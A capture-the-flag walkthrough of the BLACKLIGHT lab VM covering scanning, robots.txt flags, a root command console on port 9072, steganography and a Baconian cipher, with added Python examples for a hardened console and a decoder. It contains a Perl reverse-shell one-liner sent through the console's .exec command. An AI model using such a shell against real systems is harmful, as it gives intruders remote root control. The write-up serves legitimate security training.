Let's first start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -sS -sV -sC -Pn -O -T5 -p- 192.168.0.40

Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-15 13:39 MDT
Nmap scan report for 192.168.0.40
Host is up (0.00049s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_    BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9072-TCP:V=7.60%I=7%D=10/15%Time=5DA62126%P=x86_64-pc-linux-gnu%r(N
SF:ULL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20inst
SF:ructions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\
SF:x20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20con
SF:sole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOption
SF:s,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20
SF:\.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\
SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindR
SF:eq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(DNSStatusRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Ty
SF:pe\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20consol
SF:e\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessionReq
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x2
SF:0\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNeg,34,
SF:"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruction
SF:s\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString,34,"
SF:BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions
SF:\n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.he
SF:lp\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,34,"B
SF:LACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\
SF:n")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x
SF:20for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20console\x2
SF:0mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLACKLIGH
SF:T\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 334.99 seconds
root@ubuntu:~#
Nmap found two open ports, 80 and 9072. Let's fire up dirb and start looking for some interesting directories we can browse.
---- Scanning URL: http://192.168.0.40/ ----
==> DIRECTORY: http://192.168.0.40/css/
==> DIRECTORY: http://192.168.0.40/fonts/
==> DIRECTORY: http://192.168.0.40/footer/
==> DIRECTORY: http://192.168.0.40/img/
+ http://192.168.0.40/index.html (CODE:200|SIZE:1759)
==> DIRECTORY: http://192.168.0.40/javascript/
==> DIRECTORY: http://192.168.0.40/js/
+ http://192.168.0.40/robots.txt (CODE:200|SIZE:40)
+ http://192.168.0.40/server-status (CODE:403|SIZE:300)

---- Entering directory: http://192.168.0.40/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.40/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.40/footer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.40/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.40/javascript/ ----
==> DIRECTORY: http://192.168.0.40/javascript/jquery/

---- Entering directory: http://192.168.0.40/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.0.40/javascript/jquery/ ----
+ http://192.168.0.40/javascript/jquery/jquery (CODE:200|SIZE:268026)
Dirb came back with some interesting results, which led to nothing really. Our next step is to see if a robots.txt file exists.
User-agent: *
flag1.txt
blacklight.dic
We got the robots.txt file with two entries in it, one of them being a flag. The other file seems to be a dictionary file, which we will save for later use.
{flag1:fc4c7223964a26b152823d14f129687207e7fe15}
9072. The secret is at home.
Let's move on to port 9072. This port seems to be some sort of remote command shell that lets you run commands. There is one caveat though: you are limited to two commands, after which the server locks itself against further use. We first try the readhash command to retrieve a hash.
b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6
The other commands available to us are exec and quit. Let's try to exec a reverse connect shell.
BLACKLIGHT console mk1. Type .help for instructions
.help
.readhash - Get one step closer
.exec- Execute commands
.quit - Exit the server
.exec perl -e 'use Socket;$i="192.168.0.42";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
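The weakness of the port 9072 service is the .exec verb: whatever the client sends after it is handed to a shell, and the process runs as root. The following is an added example, not the VM's console.rb (the writeup never shows that code): a minimal Python re-creation of the same console pattern with the .exec pass-through removed. Every verb maps to a fixed handler, no client text reaches a shell, and the session keeps the two-command lockout described above. The hash value, the budget rules (every line spends one command, including .help) and the reply strings for locked and closed sessions are assumptions made for the example.

```python
# Added example, not the VM's console.rb: an allow-listed re-creation of the
# port 9072 console with no ".exec" verb and a bounded command budget.

import hashlib
import sys

BANNER = "BLACKLIGHT console mk1. Type .help for instructions"
COMMAND_BUDGET = 2  # assumption: every line, .help included, spends one

# Assumption: on the VM the hash is read from hash.txt at startup; a
# constructed stand-in is used here so the example runs offline.
SAMPLE_HASH = hashlib.sha256(b"constructed sample secret").hexdigest()


class Console:
    """One client session: allow-listed verbs, bounded command count."""

    def __init__(self, secret_hash: str = SAMPLE_HASH, budget: int = COMMAND_BUDGET):
        self.secret_hash = secret_hash
        self.remaining = budget
        self.locked = False
        self.closed = False
        # The allow-list is the whole attack surface: there is no ".exec",
        # and no handler builds a command line from client input.
        self.handlers = {
            ".help": self.cmd_help,
            ".readhash": self.cmd_readhash,
            ".quit": self.cmd_quit,
        }

    def cmd_help(self, arg: str) -> str:
        return "\n".join([".readhash - Get one step closer", ".quit - Exit the server"])

    def cmd_readhash(self, arg: str) -> str:
        return self.secret_hash

    def cmd_quit(self, arg: str) -> str:
        self.closed = True
        return "bye"

    def handle(self, line: str) -> str:
        """Process one client line and return the text to send back."""
        if self.closed:
            return "connection closed"
        if self.locked:
            return "console locked"
        verb, _, arg = line.strip().partition(" ")
        handler = self.handlers.get(verb)
        if handler is None:
            # Unknown verbs (".exec" among them) get a fixed reply and still
            # spend budget, so probing costs the client as much as a real command.
            response = f"unknown command: {verb}"
        else:
            response = handler(arg)
        self.remaining -= 1
        if self.remaining <= 0:
            self.locked = True
        return response


if __name__ == "__main__":
    # Scripted session on stdin, e.g.: printf '.readhash\n.exec id\n' | python3 console.py
    console = Console()
    print(BANNER)
    for line in sys.stdin:
        print(console.handle(line))
```

The point of the allow-list is that the set of things a client can make the process do is exactly the set of handler methods, so the two-command budget becomes a rate limit on harmless lookups rather than, as on the VM, a budget of two root shell commands.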
We got a successful connection back as root! Now let's move on to finding the other flags. We cd to the /home directory, where the clue led us earlier, to find the secret.
root@blacklight:/home# cd blacklight
root@blacklight:/home/blacklight# ls -la
total 48
drwxr-xr-x 6 blacklight blacklight 4096 Jun  7  2018 .
drwxr-xr-x 3 root       root       4096 Jun  7  2018 ..
-rw------- 1 blacklight blacklight 1019 Jun  8  2018 .bash_history
-rw-r--r-- 1 blacklight blacklight  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 blacklight blacklight 3771 Apr  4  2018 .bashrc
drwx------ 2 blacklight blacklight 4096 Jun  7  2018 .cache
-rwxrwxr-x 1 blacklight blacklight 1019 Jun  7  2018 console.rb
drwx------ 3 blacklight blacklight 4096 Jun  7  2018 .gnupg
-rw-r--r-- 1 root       root         65 Jun  7  2018 hash.txt
drwxrwxr-x 3 blacklight blacklight 4096 Jun  7  2018 .local
-rw-r--r-- 1 blacklight blacklight  666 Jun  7  2018 .profile
drwxr-xr-x 2 root       root       4096 Jun  7  2018 .secret
-rw-r--r-- 1 blacklight blacklight    0 Jun  7  2018 .sudo_as_admin_successful
root@blacklight:/home/blacklight#
We download flag2.jpg and use the steganography tool outguess to extract the flag hidden in the image.
sam@ubuntu:~$ outguess -r flag2-inside.jpg flag2.txt
Reading flag2-inside.jpg....
Extracting usable bits:   18496 bits
Steg retrieve: seed: 180, len: 133
sam@ubuntu:~$ cat flag2.txt
{flag2:88ea7554cbc7e89526943e9ad5d3ce2ed5ec3db4}
Francis Bacon says: BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA
sam@ubuntu:~$
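The text recovered from the image is a Baconian cipher: each letter is encoded as five A/B symbols, so the three whitespace-separated groups (20, 15 and 25 symbols) are three words. The decoder below is an added example, not part of the writeup. It assumes the classic 24-letter Bacon alphabet, in which I and J share one code and U and V share another; the 26-letter variant is included so you can see that the same groups do not read as words under it, which is how you tell the two variants apart when the hint does not say which one was used.

```python
# Added example: Baconian cipher decoder applied to the outguess output above.

# Classic 24-letter alphabet: I stands for I/J, U stands for U/V.
ALPHABET_24 = "ABCDEFGHIKLMNOPQRSTUWXYZ"
# Modern 26-letter variant, one code per letter.
ALPHABET_26 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def decode_group(group: str, alphabet: str = ALPHABET_24) -> str:
    """Decode one run of A/B symbols (length a multiple of 5) into letters."""
    group = group.strip().upper()
    if len(group) % 5 != 0 or set(group) - {"A", "B"}:
        raise ValueError(f"not a valid Bacon group: {group!r}")
    letters = []
    for i in range(0, len(group), 5):
        code = group[i:i + 5]
        # A is the 0 bit and B the 1 bit, most significant symbol first.
        index = int(code.replace("A", "0").replace("B", "1"), 2)
        if index >= len(alphabet):
            raise ValueError(f"code {code} has no letter in a {len(alphabet)}-letter alphabet")
        letters.append(alphabet[index])
    return "".join(letters)


def decode_message(text: str, alphabet: str = ALPHABET_24) -> str:
    """Decode whitespace-separated groups into space-separated words."""
    return " ".join(decode_group(group, alphabet) for group in text.split())


# Ciphertext copied from the flag2.txt output above.
FLAG2_HINT = "BAAAAAABAAAAAAAAAABB AABAABAABAAAABA AAAABAAAAAAAABAABBABABBAA"

if __name__ == "__main__":
    print("24-letter:", decode_message(FLAG2_HINT, ALPHABET_24))
    print("26-letter:", decode_message(FLAG2_HINT, ALPHABET_26))
```

Under the 24-letter alphabet the hint decodes to READ ETC BACON; under the 26-letter alphabet the same symbols give QEAD ESC BACNM, which is why the decoder tries the classic table first for a puzzle that names Francis Bacon.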